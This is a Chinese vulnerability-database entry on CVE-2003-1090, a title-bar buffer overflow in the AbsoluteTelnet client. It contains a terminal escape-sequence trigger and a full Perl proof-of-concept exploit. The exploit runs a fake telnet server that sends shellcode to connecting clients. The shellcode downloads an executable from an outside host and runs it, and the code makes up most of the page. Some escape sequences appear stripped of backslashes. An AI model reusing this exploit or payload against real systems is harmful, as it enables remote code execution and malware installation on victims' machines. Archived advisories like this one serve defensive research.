Celestial Software AbsoluteTelnet标题栏远程缓冲区溢出漏洞

漏洞ID	1107184	漏洞类型	边界条件错误
发布时间	2003-02-06	更新时间	2005-10-20
CVE编号	CVE-2003-1090	CNNVD-ID	CNNVD-200302-001
漏洞平台	Windows	CVSS评分	10.0

|漏洞来源

https://www.exploit-db.com/exploits/22229
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200302-001

|漏洞详情

AbsoluteTelnet是一款终端客户程序，支持多种协议包括Telnet、SSH1、SSH2等，可使用在Win32平台下。AbsoluteTelnet对超长标题栏缺少正确边界检查，本地或者远程攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能以进程用户权限在系统上执行任意指令。当设置程序标题栏(titlebar)过长时，AbsoluteTelnet运行时可覆盖堆栈返回地址，如：exportKNUD=`perl-e’print”A”x296’`echo-ne”33]0;$KNUD07″用户可以诱使目标用户’cat’一个文件来执行这个攻击。当AbsoluteTelnet设置为”defaulttelnetclient”时，构建包含如下Metarefresh的网页，可以触发此类问题：.

|漏洞EXP

source: http://www.securityfocus.com/bid/6785/info

A buffer overflow vulnerability was reported for AbsoluteTelnet. The vulnerability exists due to insufficient bounds checking performed when setting the title bar of the client. 

An attacker can exploit this vulnerability by enticing a victim user to view a website with malicious HTML tags. This will cause the buffer overflow condition. Code execution may be possible.

#!/usr/bin/perl
#UK2-SEC presents..
#absolute telnet 2.00 buffer overflow
#proof of concept code
#based on [email protected] advisory
#thanx knud..
#
#Coded by:
#deadbeat
#[email protected]
#
#UK2-SEC...
use IO::Socket;
$user = "new";
$pass = "iamnew";
$shellcode = 
"xF0x00x00x00x58x55x89xE5x81xECx2Cx00x00x00x89x45xD4xC7x45xFC".
"x00x00xE6x77x8Bx45xFCx66x81x38x4Dx5Ax75x7Cx05x3Cx00x00x00x8B".
"x18x03x5DxFCx66x81x3Bx50x45x75x6Bx81xC3x78x00x00x00x8Bx33x03".
"x75xFCx81xC6x18x00x00x00xADx89x45xF4xADx03x45xFCx89x45xF0xAD".
"x03x45xFCx89x45xECxADx03x45xFCx89x45xE8x31xFFx8Bx45xD4x05x0F".
"x00x00x00x89x45xDCxC7x45xD8x0Dx00x00x00xE8x2Dx00x00x00x8Bx55".
"xDCx89x55xE0x8Bx45xD4x89x45xDCxC7x45xD8x0Fx00x00x00xE8x15x00".
"x00x00x8Bx55xDCx89x55xE4x8Bx45xE0x89xD3xE9x77x00x00x00xE9xF6".
"x00x00x00x31xC0x89x45xF8x8Bx7DxF8x3Bx7DxF4x7Dx43x47x89x7DxF8".
"x31xC0x8Bx45xF8xC1xE0x02x8Bx5DxECx01xC3x8Bx03x03x45xFCx89xC7".
"x8Bx75xDCx8Bx4DxD8xF3xA6x75xD6x31xC0x8Bx45xF8xD1xE0x8Bx5DxE8".
"x01xC3x31xC0x66x8Bx03xC1xE0x02x8Bx5DxF0x01xD8x8Bx18x03x5DxFC".
"x89x5DxDCxC3xE8x0BxFFxFFxFFx47x65x74x50x72x6Fx63x41x64x64x72".
"x65x73x73x00x4Cx6Fx61x64x4Cx69x62x72x61x72x79x41x00xE9x82x00".
"x00x00x5Fx55x89xE5x81xECx1Cx00x00x00x89x45xE8x89x5DxE4x89x7D".
"xFCxC7x45xECx06x00x00x00x8Bx45xFCx89x45xF4x05x46x00x00x00x89".
"x45xF0xE8x27x00x00x00xC7x45xECx03x00x00x00x8Bx45xFCx05x4Cx00".
"x00x00x89x45xF4x05x3Cx00x00x00x89x45xF0xE8x08x00x00x00x8Bx45".
"xFCxE9xCBx00x00x00x8Bx45xF4x50xFFx55xE8x85xC0x74x20x89x45xF8".
"x8Bx75xF0x8Bx4DxECx8Bx5DxF4x31xC0xACx01xC3x8Bx45xF8x60x53x50".
"xFFx55xE4x89x03x61xE2xEAxC3x90xEBxFDxE8x79xFFxFFxFFx6Bx65x72".
"x6Ex65x6Cx33x32x2Ex64x6Cx6Cx00x56x69x72x74x75x61x6Cx41x6Cx6C".
"x6Fx63x00x5Fx6Cx63x72x65x61x74x00x5Fx6Cx77x72x69x74x65x00x5F".
"x6Cx63x6Cx6Fx73x65x00x57x69x6Ex45x78x65x63x00x45x78x69x74x50".
"x72x6Fx63x65x73x73x00x0Dx1Ax22x2Ax32x3Ax77x69x6Ex69x6Ex65x74".
"x2Ex64x6Cx6Cx00x49x6Ex74x65x72x6Ex65x74x4Fx70x65x6Ex41x00x49".
"x6Ex74x65x72x6Ex65x74x4Fx70x65x6Ex55x72x6Cx41x00x49x6Ex74x65".
"x72x6Ex65x74x52x65x61x64x46x69x6Cx65x00x0Cx1Ax2Bx90x31xC0x50".
"x8Bx8Ex6Ax00x00x00xFFx51x3AxE9xE9x00x00x00x5Ex89x86x6Ax00x00".
"x00x68x04x00x00x00x68x00x10x00x00x68x9Fx86x01x00x68x00x00x00".
"x00x8Bx8Ex6Ax00x00x00xFFx51x0Dx89x86x00x00x00x00x31xC0x50x50".
"x50x50x50x8Bx8Ex6Ax00x00x00xFFx51x58x89x86x04x00x00x00x31xC0".
"x50x50x50x50x8Dx86x08x00x00x00x50x8Bx86x04x00x00x00x50x8Bx8E".
"x6Ax00x00x00xFFx51x66x89x86x04x00x00x00x8Dx86x62x00x00x00x50".
"x68x9Fx86x01x00x8Bx86x00x00x00x00x50x8Bx86x04x00x00x00x50x8B".
"x8Ex6Ax00x00x00xFFx51x77x68x00x00x00x00x8Dx86x58x00x00x00x50".
"x8Bx8Ex6Ax00x00x00xFFx51x1Ax89x86x66x00x00x00x8Bx86x62x00x00".
"x00x50x8Bx86x00x00x00x00x50x8Bx86x66x00x00x00x50x8Bx8Ex6Ax00".
"x00x00xFFx51x22x8Bx86x66x00x00x00x50x8Bx8Ex6Ax00x00x00xFFx51".
"x2Ax68x05x00x00x00x8Dx86x58x00x00x00x50x8Bx8Ex6Ax00x00x00xFF".
"x51x32xE9x06xFFxFFxFFxE8x12xFFxFFxFFx00x00x00x00x00x00x00x00".
"x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex64x65x6Cx69x6Bx6Fx6Ex2Ex64".
"x65x2Fx6Bx6Cx65x69x6Ex2Ex65x78x65x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x6Bx6Cx65x69x6Ex2Ex65x78x65x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x90";
$shell_len = length($shellcode);
print "Length of shellcode is: $shell_lenn";
$buf = "x00" x 261;
$buf .= $shellcode;
print "nUK2-SEC presents..n";
print "absolutetelnet 2.00 buffer overflown";
print "Should start POC on port:1331n";
$server =IO::Socket::INET->new
(
   LocalPort => 1331,
   Type => SOCK_STREAM,
   Reuse => 1,
   Listen => 5
) or die "Couldn't open POC server...n";
while ($client = $server->accept()) {
   print $client "Welcome to localhost.localdomainn";
   print $client "login using the password:iamnewn";
   sleep 2;
   print $client "nnPassword: ";
   $passcheck = <$client>;
   unless($passcheck = $pass){
     print $client "nnWrong password..n";
     close $server;
   }
   print $client"nnUser verfied..n";
   print $client "33]0$buf07";
}
close $server;

|参考资料

来源:US-CERTVulnerabilityNote:VU#666073
名称:VU#666073
链接:http://www.kb.cert.org/vuls/id/666073
来源:XF
名称:absolutetelnet-title-bar-bo(11265)
链接:http://xforce.iss.net/xforce/xfdb/11265
来源:BID
名称:6785
链接:http://www.securityfocus.com/bid/6785
来源:BUGTRAQ
名称:20030206AbsoluteTelnet2.00bufferoverflow.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=104454984001076&w;=2
来源:OSVDB
名称:16024
链接:http://www.osvdb.org/16024

相关推荐: CVSWeb不安全perl “open”漏洞

CVSWeb不安全perl “open”漏洞漏洞ID 1105915 漏洞类型输入验证发布时间 2000-07-12 更新时间 2005-05-02 CVE编号 CVE-2000-0670 CNNVD-ID CNNVD-200007-033 漏洞平台 U…

文章版权归作者所有，未经允许请勿转载。

THE END